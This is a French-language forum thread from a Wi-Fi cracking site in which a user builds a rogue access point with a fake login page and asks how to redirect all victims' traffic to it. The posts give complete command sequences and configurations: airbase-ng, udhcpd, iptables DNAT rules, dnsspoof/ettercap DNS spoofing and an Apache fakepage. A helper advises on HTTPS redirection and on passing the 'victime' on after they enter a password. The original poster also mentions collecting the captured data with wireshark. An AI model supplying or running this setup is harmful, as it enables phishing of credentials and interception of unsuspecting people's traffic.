Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 30-08-2016 13:24:23

Sinaï00
Membre Actif
Inscription : 08-04-2015
Messages : 43

Rogue ap fakepage

Bonjours à tous.

Je viens vers vous car je touche au but et j'ai besoin d'un petit coup de pouce.
Je réussi à mettre en place un serveur transparent avec accès internet sur mon ordinateur cible.
Merci à Antares et oyabi au passage.
Malheureusement je n'arrive pas à charger ma fakepage lors de n'importe quelle recherche.
Le pc cible me retourne pas d’accès internet. Par contre si je tape l'ip de at0 sur mon pc cible 192.168.2.1 j'ai ma page de teste Apache2 qui ce charge.

Les commandes utilisées sont les suivantes :

ifconfig wlan2 down
iwconfig wlan2 mode monitor
ifconfig wlan2 up

airbase-ng -c 3 -e teste -v wlan2

ifconfig at0 up
ifconfig at0 192.168.2.1 netmask 255.255.255.0

udhcpd /tmp/udhcpd.conf

service apache2 start
iptables -F
iptables -X
iptables -t nat -F
iptables -t nat -X
iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to 192.168.2.1
iptables -t nat -A PREROUTING -p udp --dport 53 -j DNAT --to 192.168.2.1
iptables --table nat --append POSTROUTING --out-interface wlan1 -j MASQUERADE
iptables --append FORWARD --in-interface at0 -j ACCEPT
dnsspoof -i at0 -f /root/dns.txt

Mon UDHCPD.conf :

max_leases 10
start 192.168.2.10
end 192.168.2.20
interface at0
domain local
option dns 8.8.8.8
option subnet 255.255.255.0
option router 192.168.2.1
lease 7200
lease_file /tmp/udhcpd.leases

Mon dns.txt :

192.168.2.1 *.*

Je pense que le probléme doit venir d'une de ces deux lignes la :

iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to 192.168.2.1
iptables -t nat -A PREROUTING -p udp --dport 53 -j DNAT --to 192.168.2.1

qui ne semble pas être bonne par rapport à mon fichier DHCPD.conf
et je pense peut être avec mon options domaine-name-server

option dns 8.8.8.8

Une idée ??
Merci

edit : J'ai essayer de changer mon option DNS dans mon fichier udhcpd.conf est de le remplacer par mon adresse routeur 192.168.2.1 ça ne change rien.
ma page ce charge toujours en tapant 1.168.2.1 et 8.8.8.8 et ça je ne comprend pas trop pourquoi !!

Dernière modification par Sinaï00 (04-09-2016 10:47:04)

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 07-09-2016 23:03:53

Sinaï00
Membre Actif
Inscription : 08-04-2015
Messages : 43

Re : Rogue ap fakepage

Les outils utilisé : kali linux 2016, udhcpd, airbase-ng, apache2, dnsspoof.

Bon j'ai finalement réussi à :

-Créer un réseau avec accès à internet.
-paramétrer tant bien que mal mon serveur udhcp et donner une adresse ip à ma cible.
-faire fonctionner presque correctement apache2
-faire un dnsspoof presque efficace

Mon soucis c'est que quand la cible ce connecte à ma rogue elle n'est pas toujours rediriger vers ma page de test apache2 contenu dans le dossier var/www/
Au moins elle est un peu rediriger, c'est toujours mieux qu'il y a une semaine.

J'ai essayer de mettre la régle iptable suivant qui pourtant devrait rediriger l'ensemble du trafic vers ma page de teste mais rien n'y fait. J'ai toujours besoin d'un dnsspoofing pour rediriger l'ensemble du traffic.

iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to-destination 192.168.2.1

J'ai régler le probléme de l'erreur 404 grâce à un fichier .htacces présent dans mon dossier var/www

Mon fichier dns.txt contient les éléments suivant :

192.168.2.1 A *.fr
192.168.2.1 A *.com
192.168.2.1 A *.net
192.168.2.1 A *.org
www.* A 192.168.2.1
http//.* A 192.168.2.1
https//.* A 192.168.2.1

Malheureusement pour l'ensemble des fichiers en https cela ne marche pas...
mes question sont les suivantes :
Comment faire pour forcer l'ensemble du trafic à ce rediriger vers ma fakepage ??
Pourquoi avec ma réglé iptable cela ne fonctionne pas simplement ^^ ??
C'est forcément possible car avec les réseaux ouvert du style free wifi on à une page de connexion qui reste la même peu importe l'url taper donc la pas de problème de DNS  ??

Rappelle des commandes utilisé :

touch /tmp/udhcpd.leases

airbase-ng  -e "teste" -c 1 wlan1

ifconfig at0 192.168.2.1 netmask 255.255.255.0

route add -net 192.168.2.0 netmask 255.255.255.0 gw 192.168.2.1

echo 1 > /proc/sys/net/ipv4/ip_forward
	
iptables --table nat --append POSTROUTING --out-interface wlan0 -j MASQUERADE

iptables --append FORWARD --in-interface at0 -j ACCEPT

iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to-destination 192.168.2.1

udhcpd /tmp/udhcpd.conf

service apache2 start

dnsspoof -i at0 -f /root/dns.txt

Voilà c'est un question plutôt spécifique, j’espère que quelqu’un passant par la pourras m'aider à trouver un semblant de réponse.

Mon objectif étant après ça de développer un petit tool en python pour automatiser l'ensemble du processus.
Je sais que ça à déjà était fait mais j'ai envie de le faire moi même, ça me permet de me faire la main.

Hors Ligne

#3 09-09-2016 22:30:47

antares145
Membre d'honneur
Inscription : 29-09-2009
Messages : 5 199
Site Web

Re : Rogue ap fakepage

Salut SinaÏ00,

Si j'ai bien compris, ta redirection fonctionne correctement pour les pages en HTTP, mais bloque pour les HTTPS ? Dans ce cas, tu devrais ajouter une règle de redirection sur le port 443, identique à celle pour le port 80 :

iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to-destination 192.168.2.1

Le problème, c'est que si tu n'as pas un certificat proprement signé, ça va faire gueuler n'importe quel navigateur un peu récent (et sérieux).

Une meilleure piste (si tu veux imiter les portails genre FreeWiFi, c'est de déployer un "portail captif" (captive portal en anglais), qui sert précisément à ça. À l'époque, j'avais un peu travaillé avec WiFiDog (en mode ultra-simpliste), mais je ne me rappelle pas assez des détails pour te donner une base de tutoriel.
C'est également possible de créer un portail captif en utilisant Apache (mais j'ai jamais vraiment accroché avec Apache, trop lourd et overkill pour mon usage en général). Tu peux également trouver des tutos sur le net, surtout en anglais. Ça doit être possible avec Nginx également, voir même avec Django si tu touches un peu python.

Le challenge à partir de là, c'est de sortir du portail captif, genre rediriger la victime vers son site web souhaité une fois qu'elle a entré son mot de passe. Mais je ne sais pas si ça fait partie de tes objectifs, ou si tu veux juste "isoler" la victime en question sur une fakepage statique.

Bonne chance ! smile

Hors Ligne

#4 12-09-2016 21:13:48

Sinaï00
Membre Actif
Inscription : 08-04-2015
Messages : 43

Re : Rogue ap fakepage

yes merci beaucoup de ta réponse. Je vais me pencher la dessus. Il semblerai qu'il sois possible de monter un portail captif uniquement avec iptables et apache2 mais je n'arrive pas encore à gérer iptables correctement pour en arriver la.
Puis c'est vrai que Apache il y'a  beaucoup de paramètre à prendre en compte...
Je connaissais pas le terme de portail captif, bien que tu en ais parlé sur ton blog j'ai réussi à pas le voir !
J'ai fais quelques recherches et c'est vrai qu'avec ce terme de vocabulaire ça ouvre beaucoup mon chant de recherche smile

Pour l'instant j'ai trouvé un solution plutôt convenable, c'est de travailler avec ettercap. L'avantage c'est qu'un fois le pc cible connecté sur le réseaux une page web s'ouvre automatiquement avec la fakepage.
Et ça c'est plaisant ^^

Si ça intéresse quelqu’un qui passe par la, voici la démarche à suivre :

airbase-ng -e teste -c 3 wlan1

service apache2 start
ifconfig at0 up
ifconfig at0 192.168.2.1 netmask 255.255.255.0
route add -net 192.168.2.0 netmask 255.255.255.0 gw 192.168.2.1
udhcpd /tmp/udhcpd.conf

ettercap -Tqi at0 -P dns_spoof

Si peu de ligne de code pour autant de temps de recherche ça me fatigue!! roll
La page s'ouvre automatiquement et fonctionne pour l'ensemble des requête en HTTP.
Pour le HTTPS il n'y à pas de connections

Voilà après suffit normalement de récupérer les donnés avec mysql ou wireshark sur at0. pas essayé encore.

Il y'a encore des modifications à faire, mais c'est déjà un peu fonctionnel.

En tout cas merci des conseils antares, je vais faire des recherches sur ce nouveau terme pour arriver à quelque chose de concluant.
Saloute wink

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

Sujets similaires

Discussion Réponses Vues Dernier message
106 2185 28-11-2016 19:42:10 par koala
35 1827 23-11-2016 16:31:33 par roofnat
16 1044 17-11-2016 12:22:00 par disquette
10 433 11-11-2016 22:11:03 par koala
[ Projet Rogue AP ] par shirocen
16 452 19-10-2016 05:14:45 par shirocen

Pied de page des forums


Le coin des bonnes affaires, achats informatiques:


|   Alfa 1000 mW AWUS036H   |    Linksys WRT54GL   |    Misco, informatique   |   
 |    Ebay   |    PC portables   |    PC Gamers & Tuning   |    Cles USB   |   
|   Disques durs externes 2 To   |   
|   Wifi-highpower.com   |   


Server Stats - [ Generated in 0.022 seconds ]   Forum Stat - [ Most users ever online on the forum was : 150 on 20-09-2009 17:06:59 ]